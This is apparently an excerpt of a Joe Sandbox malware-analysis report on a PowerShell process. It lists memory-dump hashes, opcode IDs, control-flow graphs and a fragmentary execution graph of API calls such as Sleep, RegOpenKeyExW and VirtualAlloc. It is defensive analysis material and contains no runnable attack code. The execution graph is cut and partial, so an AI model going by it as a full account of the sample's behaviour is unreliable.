                                                                                                  • Instruction Fuzzy Hash: A82213B5B00316DFFB358FA988407ABB7E5BF85211F1480AAE9099B251DF35CD41CBA1

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 200 8496421-8496463 202 849646b-8496497 SetThreadToken 200->202 203 8496499-849649f 202->203 204 84964a0-84964bd 202->204 203->204
                                                                                                  APIs
                                                                                                  • SetThreadToken.KERNELBASE(EFD807F3), ref: 0849648A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1365410846.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8490000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ThreadToken
                                                                                                  • String ID:
                                                                                                  • API String ID: 3254676861-0
                                                                                                  • Opcode ID: 4c3fd551c59466669687902101ec6545b537284fdb66ee5fda64711e7b30f728
                                                                                                  • Instruction ID: c2f5a7fb422c797764c539083d7046b822829f75521f5923eccb3d94b2bb834e
                                                                                                  • Opcode Fuzzy Hash: 4c3fd551c59466669687902101ec6545b537284fdb66ee5fda64711e7b30f728
                                                                                                  • Instruction Fuzzy Hash: EA1116B59006488FDB10DF9AD845BDEFBF8EB88324F14842AD458A7350C774A944CFA5

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 207 8496428-8496497 SetThreadToken 209 8496499-849649f 207->209 210 84964a0-84964bd 207->210 209->210
                                                                                                  APIs
                                                                                                  • SetThreadToken.KERNELBASE(EFD807F3), ref: 0849648A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1365410846.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8490000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ThreadToken
                                                                                                  • String ID:
                                                                                                  • API String ID: 3254676861-0
                                                                                                  • Opcode ID: 6d41e8e4c873de1ce70f6aaa49a918b9dd61b00d108a4857aa3921b9aed3137a
                                                                                                  • Instruction ID: 62837b770f9a67d21002eca3e62406d953e57c408fa05fdc331f6958e019924c
                                                                                                  • Opcode Fuzzy Hash: 6d41e8e4c873de1ce70f6aaa49a918b9dd61b00d108a4857aa3921b9aed3137a
                                                                                                  • Instruction Fuzzy Hash: 2C1106B59007488FDB10DF9AC844BDEFBF8EB88324F14842AD458A7350C774A944CFA5

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1362601776.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 14ba97773e67251c5a74549f1a62e117021c78160c490eab3a01a87b128987c3
                                                                                                  • Instruction ID: d23f10c53fb306840abc719d95fef7d12daf338af0d6a2c0d827dc76132bb7a5
                                                                                                  • Opcode Fuzzy Hash: 14ba97773e67251c5a74549f1a62e117021c78160c490eab3a01a87b128987c3
                                                                                                  • Instruction Fuzzy Hash: BA1249B2B043459FEB359BA8980077ABBA6AFC1215F14C0BAD509DF251DF35CC52C7A2

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1362601776.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352037699.000000000430D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0430D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_430d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6df64cedfffe7817a428c677acdf609713c588fce5709cc7ea23b7683ff4be6f
                                                                                                  • Instruction ID: d9ece5e63c37db9a01456958236f7d531e50028023299761965f5881682a19c5
                                                                                                  • Opcode Fuzzy Hash: 6df64cedfffe7817a428c677acdf609713c588fce5709cc7ea23b7683ff4be6f
                                                                                                  • Instruction Fuzzy Hash: 7A212472604300EFDB15CF50D9D0B26BB65FB88314F34C6ADED090A296C376E456CBA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352037699.000000000430D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0430D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_430d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fbc1f9bb7aef52c741fcc8b9d64162643074082276acacefd78e2569e6f3cccd
                                                                                                  • Instruction ID: 316664ac6ec4b9c0d25c0f69fd7c8b8cdb475fe3c8fa7da096feeecd63bf04cd
                                                                                                  • Opcode Fuzzy Hash: fbc1f9bb7aef52c741fcc8b9d64162643074082276acacefd78e2569e6f3cccd
                                                                                                  • Instruction Fuzzy Hash: 1F214971604700DFDB24DF10D9D0B26BB65FB84314F24C66DDA094B682C3B6E446CB61
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352037699.000000000430D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0430D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_430d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: aaa4dd0c5e085e3762c1d6b0761792fc25592d1037c22869461c4c07c71260ff
                                                                                                  • Instruction ID: e64a700aa32ded42893b86caf4709f918127d90b51a51f335346345885ecff74
                                                                                                  • Opcode Fuzzy Hash: aaa4dd0c5e085e3762c1d6b0761792fc25592d1037c22869461c4c07c71260ff
                                                                                                  • Instruction Fuzzy Hash: EF2135B1604640DFDB24DF14D5D0B26BBA9EB84318F20C66DD8094B682C7BAE446CE66
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 80697dfe40b50f8095d4a97b15bdd172a3ccc1ee45342311ffbc583b9a1e67bf
                                                                                                  • Instruction ID: 1c13fbce3b57806588a5511f45475e9c9f264241caed8812e90b15cbeba5a820
                                                                                                  • Opcode Fuzzy Hash: 80697dfe40b50f8095d4a97b15bdd172a3ccc1ee45342311ffbc583b9a1e67bf
                                                                                                  • Instruction Fuzzy Hash: 60216BB1A057448FDF60CF6AC4883CAFFF6EB88310F28C42AD99D97345D67464858BA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2856c3da9bc828b93fb8ff568bf06a217625df2e442b4cb194727b64d0c9026c
                                                                                                  • Instruction ID: 5eab0ed9411186d91e0d266ecdeebd889a55bae3635bf439bc7a40a2faa8246d
                                                                                                  • Opcode Fuzzy Hash: 2856c3da9bc828b93fb8ff568bf06a217625df2e442b4cb194727b64d0c9026c
                                                                                                  • Instruction Fuzzy Hash: 361103767001148FDF04DBA9E850ADE77F6EFCC225B0440A5E909EB755DB35ED118BA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352037699.000000000430D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0430D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_430d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0a1ff3ed77492da8873f000798b5eccfdfa140a0edcf5d07c28719e7f0c4eaf6
                                                                                                  • Instruction ID: c98a109faf50acc06869f988adad0be72e784ddc2521a726ec51885c992e8221
                                                                                                  • Opcode Fuzzy Hash: 0a1ff3ed77492da8873f000798b5eccfdfa140a0edcf5d07c28719e7f0c4eaf6
                                                                                                  • Instruction Fuzzy Hash: 7C21AC76504240DFCB16CF10D9C4B16BF72FB88314F28C6A9DC494A696C33AD46ACB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352037699.000000000430D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0430D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_430d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 62689c8865068cc93af7210c9081feec56fabea3ec3c604bca0db3eed12ede5f
                                                                                                  • Instruction ID: cd0b8872cdfd3acbd48d8870fa16ce8f48e0eeb6ffa14caff2df892f0f9ee3fb
                                                                                                  • Opcode Fuzzy Hash: 62689c8865068cc93af7210c9081feec56fabea3ec3c604bca0db3eed12ede5f
                                                                                                  • Instruction Fuzzy Hash: BD11DD75504280CFCB25CF10D9D4B15BFA1FB84328F28C6AAD9494B696C37AE44ACFA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bffbee5ed7d3f1635a78737d7690579868500499b6069c6d3d7ae61977bf50bb
                                                                                                  • Instruction ID: fd91bb690b7854a2526eae358180dff26b93aa42bb2bfe8ee329c8807ae4aaf0
                                                                                                  • Opcode Fuzzy Hash: bffbee5ed7d3f1635a78737d7690579868500499b6069c6d3d7ae61977bf50bb
                                                                                                  • Instruction Fuzzy Hash: BE110C346092548FDB07CFA8D8A45E9BF70FF4A310B0481D7D4649B2A2C726E815CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ec6c50abb638456a7de1a5f07f2020d9dc8fdeb44380b6c627cd7d8fb1aacbba
                                                                                                  • Instruction ID: 1e65352d0cd1844f1506991bb68ea56c9538d0ea45d5feb5a585095fb12c648e
                                                                                                  • Opcode Fuzzy Hash: ec6c50abb638456a7de1a5f07f2020d9dc8fdeb44380b6c627cd7d8fb1aacbba
                                                                                                  • Instruction Fuzzy Hash: 3701D2316083449FDB14CB75D494AAA7FF5EF45210B1484EED08AC7BA2CA34FC85C740
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352037699.000000000430D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0430D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_430d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: deaf7814bbff010780c272432e072615c0310a72bd20aa9b88ce157ec5354446
                                                                                                  • Instruction ID: cdc9feb0304c84c84f6ff81d3367aa72b3d18b3bd147f8cc1ea46f80809e8178
                                                                                                  • Opcode Fuzzy Hash: deaf7814bbff010780c272432e072615c0310a72bd20aa9b88ce157ec5354446
                                                                                                  • Instruction Fuzzy Hash: 8A11CAB55042848FCB25DF24D5D4B25BBB1FB88318F24C6ADC8494B692C37AE44ACF92
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f5c394cfc0419bda454aa663c9261b7db55ca242fca54567c09fee5544b6b7fc
                                                                                                  • Instruction ID: daa30e23869fca2fb3f86651a39a9e94ab099b13f0b6e66c6179f7a4c6b50b6a
                                                                                                  • Opcode Fuzzy Hash: f5c394cfc0419bda454aa663c9261b7db55ca242fca54567c09fee5544b6b7fc
                                                                                                  • Instruction Fuzzy Hash: 31012475F141049BCF25DA74E8104EDBBB6EF88221F1484BBD5869B311EE216C469BF1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d13803a1a15d1e783f5f5300abb22517ac272debd25ac1a00cc4fc297c450428
                                                                                                  • Instruction ID: 598866f85e71c9daaad9b3a7ad957cfe4c6f260fdf3aa00abb7f3fb78c0b8fac
                                                                                                  • Opcode Fuzzy Hash: d13803a1a15d1e783f5f5300abb22517ac272debd25ac1a00cc4fc297c450428
                                                                                                  • Instruction Fuzzy Hash: C8019235B002188FCB219F74E8096AEBBF5FB88315F104069E90AD3341DB35A912CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 72aee79df83616e3fdaa176dcccc058f9b1fe49439ad6c65e7c904d62fafb331
                                                                                                  • Instruction ID: b8f249f8493b41546bd75cea006d643b38c86a4f6a8780f082633493d2ff2981
                                                                                                  • Opcode Fuzzy Hash: 72aee79df83616e3fdaa176dcccc058f9b1fe49439ad6c65e7c904d62fafb331
                                                                                                  • Instruction Fuzzy Hash: 4211F3352047548FC728DF75D49089ABBF6EF8931972089ADD48A8BBA1CB32E845CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 13a82522ae1194179524ef59bed90b601a6cc77e897b80b542c8e9cbff9b87ca
                                                                                                  • Instruction ID: 0e29bfba1191f024aacdf205b0bfd7370f3e962e383ddf9ab627eacccb156ec1
                                                                                                  • Opcode Fuzzy Hash: 13a82522ae1194179524ef59bed90b601a6cc77e897b80b542c8e9cbff9b87ca
                                                                                                  • Instruction Fuzzy Hash: 54F0C2323093A45FD7018ABA9C549F7BFEDDF8A621B0440ABF884C7352CA71DD0487A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352037699.000000000430D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0430D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_430d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1517704eead553f9b0ea7c00150c76fded1eb14f64cb3e22f5e1b741c306e8b5
                                                                                                  • Instruction ID: 5324e63171cce3cad424ddb83cf8ac6e33c43e0f4bf4cb4789f0244d30c68aff
                                                                                                  • Opcode Fuzzy Hash: 1517704eead553f9b0ea7c00150c76fded1eb14f64cb3e22f5e1b741c306e8b5
                                                                                                  • Instruction Fuzzy Hash: B001F2715087409BE7208EA1EC80B67BBDCDF41320F08C21AEC8C0A6C2D678A941CAB2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352037699.000000000430D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0430D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_430d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b167dd1a56e9ad2352f611663b19faa4c85aff218a84f87f751ad16d3cd1b9ea
                                                                                                  • Instruction ID: 940fbb97f24025b6b90893a4637aa70217341c77de9b8b548c7c3652728f0cc8
                                                                                                  • Opcode Fuzzy Hash: b167dd1a56e9ad2352f611663b19faa4c85aff218a84f87f751ad16d3cd1b9ea
                                                                                                  • Instruction Fuzzy Hash: 47010C7240E3C09FD7128B659D94B52BFB4DF53224F19C1DBD9888F1A3C2695849C772
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6f48f094ab66fe018bb2899496debf5004b32eb6c88915a0dae657cbcf11a657
                                                                                                  • Instruction ID: 7a7c561941a2ab5beb001f2655a5cef0564fd8cc5477801041d38142bb9941ac
                                                                                                  • Opcode Fuzzy Hash: 6f48f094ab66fe018bb2899496debf5004b32eb6c88915a0dae657cbcf11a657
                                                                                                  • Instruction Fuzzy Hash: D2F02732B057149B9B2656A9BC108EF7B6EDEC61B130040BBE689CB600DE24A90643F2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352037699.000000000430D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0430D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_430d000_powershell.jbxd
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ff27912cb4072a8c52c79a9eaf9dd3f5c0d465831aa5ff5a268f15d7058303ea
                                                                                                  • Instruction ID: 352e8966e8b1f1e3a66f41861534c6a3cdbf2e71995d638256951a48665d1de1
                                                                                                  • Opcode Fuzzy Hash: ff27912cb4072a8c52c79a9eaf9dd3f5c0d465831aa5ff5a268f15d7058303ea
                                                                                                  • Instruction Fuzzy Hash: D6E0863580410D8BCB19BBB8F81B4FDBF34FB01311B01019AD942926C1DE321A87CAC1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3d09eccd15a5b23ea84b59fdff6f73f0403c5c46113e19be92461a1a7c06ef38
                                                                                                  • Instruction ID: 241fdb6e29895877770b553aeeda65e690dcea0d1b681a923ad8d94b58ae18ba
                                                                                                  • Opcode Fuzzy Hash: 3d09eccd15a5b23ea84b59fdff6f73f0403c5c46113e19be92461a1a7c06ef38
                                                                                                  • Instruction Fuzzy Hash: 4CE04F3AA0820A9BCB24EB74E4475E9BFB5BB05215B004056DD4993780EA315996DBD2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                  • Instruction ID: 22e9c3aaedff492f60d2e8575995154d43ab62e1099801af186731900e948423
                                                                                                  • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                  • Instruction Fuzzy Hash: 40D06270D042099F8780EFADC94156DFBF4EB48200F5085AA895DE7301F7315612DBD1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 73948abedbbec14ad429f210d1bb0aae90a91bbdf7e6e12cc03b5c859fc68f58
                                                                                                  • Instruction ID: 7941d7235ffaca8aed13512e942c90c9ef3f21a64b55172c3592a1d202e0ee05
                                                                                                  • Opcode Fuzzy Hash: 73948abedbbec14ad429f210d1bb0aae90a91bbdf7e6e12cc03b5c859fc68f58
                                                                                                  • Instruction Fuzzy Hash: 10D0173080410D8BCB18ABB4E81B4BDBB34FA00301F4101A9D907522D0EB362A4BCAC1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 99de61da98bc62085359227cf36e6b7992e2fb4f4ff755446bc8ffb3a5dcbb79
                                                                                                  • Instruction ID: 4a103f901824af736287a3d240301f77280f2c54f505ea4f2a73ac1e76bbf017
                                                                                                  • Opcode Fuzzy Hash: 99de61da98bc62085359227cf36e6b7992e2fb4f4ff755446bc8ffb3a5dcbb79
                                                                                                  • Instruction Fuzzy Hash: 0FD01234A0420E9BCB24EF64D44686DBBB4F744200F004156DD4593344EA305912DBD1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6b7e01db6546bd590b50cb9f2dd1815ac22e99dfcb76deb7303550d9f633e232
                                                                                                  • Instruction ID: c58c4ad14a17a7a02d57b403e8dc3e9d812d5bd10e09ea9dc1dca38c3a16c3b0
                                                                                                  • Opcode Fuzzy Hash: 6b7e01db6546bd590b50cb9f2dd1815ac22e99dfcb76deb7303550d9f633e232
                                                                                                  • Instruction Fuzzy Hash: EFD012B54483889BCB254F7C90D4D183F50AF52711F000ADDD8468A6A3CE36C049CF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2b5a2ec7402b653d37d3f0c201a1d98a215710cb00dd3710717e9bfccb57aa27
                                                                                                  • Instruction ID: 3b592217a0cb191ae487f8d5d03d48024056a72719e4f060ebdc0d208c8ca5de
                                                                                                  • Opcode Fuzzy Hash: 2b5a2ec7402b653d37d3f0c201a1d98a215710cb00dd3710717e9bfccb57aa27
                                                                                                  • Instruction Fuzzy Hash: 09C04C769291404FEF08DB35886AA27BB325766605B06869EC04286894CE64800AEA01
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 843f91047d3690cc2891e4113d55c3b7818ea9473e6f2d2f0f4ab5a3674451e6
                                                                                                  • Instruction ID: 0b1b5af9d4f5500167921ef49f073477b3ca3abd3ab3c1307c2c64736d702ffe
                                                                                                  • Opcode Fuzzy Hash: 843f91047d3690cc2891e4113d55c3b7818ea9473e6f2d2f0f4ab5a3674451e6
                                                                                                  • Instruction Fuzzy Hash: A2B0923004870C8FC2586FB9A454829772DAF80715B8004A8E80E4A7A38F36E884CA94

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:4.8%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:3.2%
                                                                                                  Total number of Nodes:629
                                                                                                  Total number of Limit Nodes:18
48822->48825 48841 2d02da0 306 API calls 48822->48841 48823->48822 48824->48822 48826 2d0f876 __NMSG_WRITE 66 API calls 48825->48826 48828 2d0e281 48826->48828 48827 2d0ca70 113 API calls 48827->48828 48828->48827 48829 2d0e2bf Sleep RegOpenKeyExW 48828->48829 48831 2d05430 268 API calls 48828->48831 48835 2d0e339 48828->48835 48829->48828 48830 2d0e2f5 RegQueryValueExW 48829->48830 48830->48828 48831->48828 48832 2d0e345 CloseHandle 48832->48822 48833 2d0fa29 289 API calls 48833->48835 48834 2d0e39f Sleep 48834->48835 48835->48832 48835->48833 48835->48834 48836 2d0e422 WaitForSingleObject CloseHandle 48835->48836 48837 2d10542 67 API calls 48835->48837 48839 2d0e3dd Sleep CloseHandle 48835->48839 48840 2d0e3cd WaitForSingleObject CloseHandle 48835->48840 48836->48835 48838 2d0e43c Sleep CloseHandle 48837->48838 48838->48822 48839->48822 48840->48839 48841->48822 48843 973366 48842->48843 48854 971100 48843->48854 48845 9734e1 48845->48626 48846 9734c6 48847 9711b0 70 API calls 48846->48847 48848 9734d8 48847->48848 48848->48626 48849 973403 timeGetTime 48862 9711b0 48849->48862 48851 973378 _memmove 48851->48845 48851->48846 48851->48849 48852 9711b0 70 API calls 48851->48852 48871 9754c0 48851->48871 48852->48851 48855 971111 48854->48855 48856 97110b 48854->48856 48903 976ba0 48855->48903 48856->48851 48858 971134 VirtualAlloc 48859 97116f 48858->48859 48860 97118a VirtualFree 48859->48860 48861 971198 48859->48861 48860->48861 48861->48851 48863 9711bd 48862->48863 48864 9711c6 48863->48864 48865 976ba0 __floor_pentium4 68 API calls 48863->48865 48864->48851 48866 9711ee 48865->48866 48867 971214 48866->48867 48868 97121b VirtualAlloc 48866->48868 48867->48851 48869 971236 48868->48869 48870 971247 VirtualFree 48869->48870 48870->48851 48872 9754dc 48871->48872 48896 97580d 48871->48896 48873 975707 VirtualAlloc 48872->48873 48874 9754e7 RegOpenKeyExW 48872->48874 48876 975745 48873->48876 48875 975515 RegQueryValueExW 48874->48875 48881 9755ba 48874->48881 
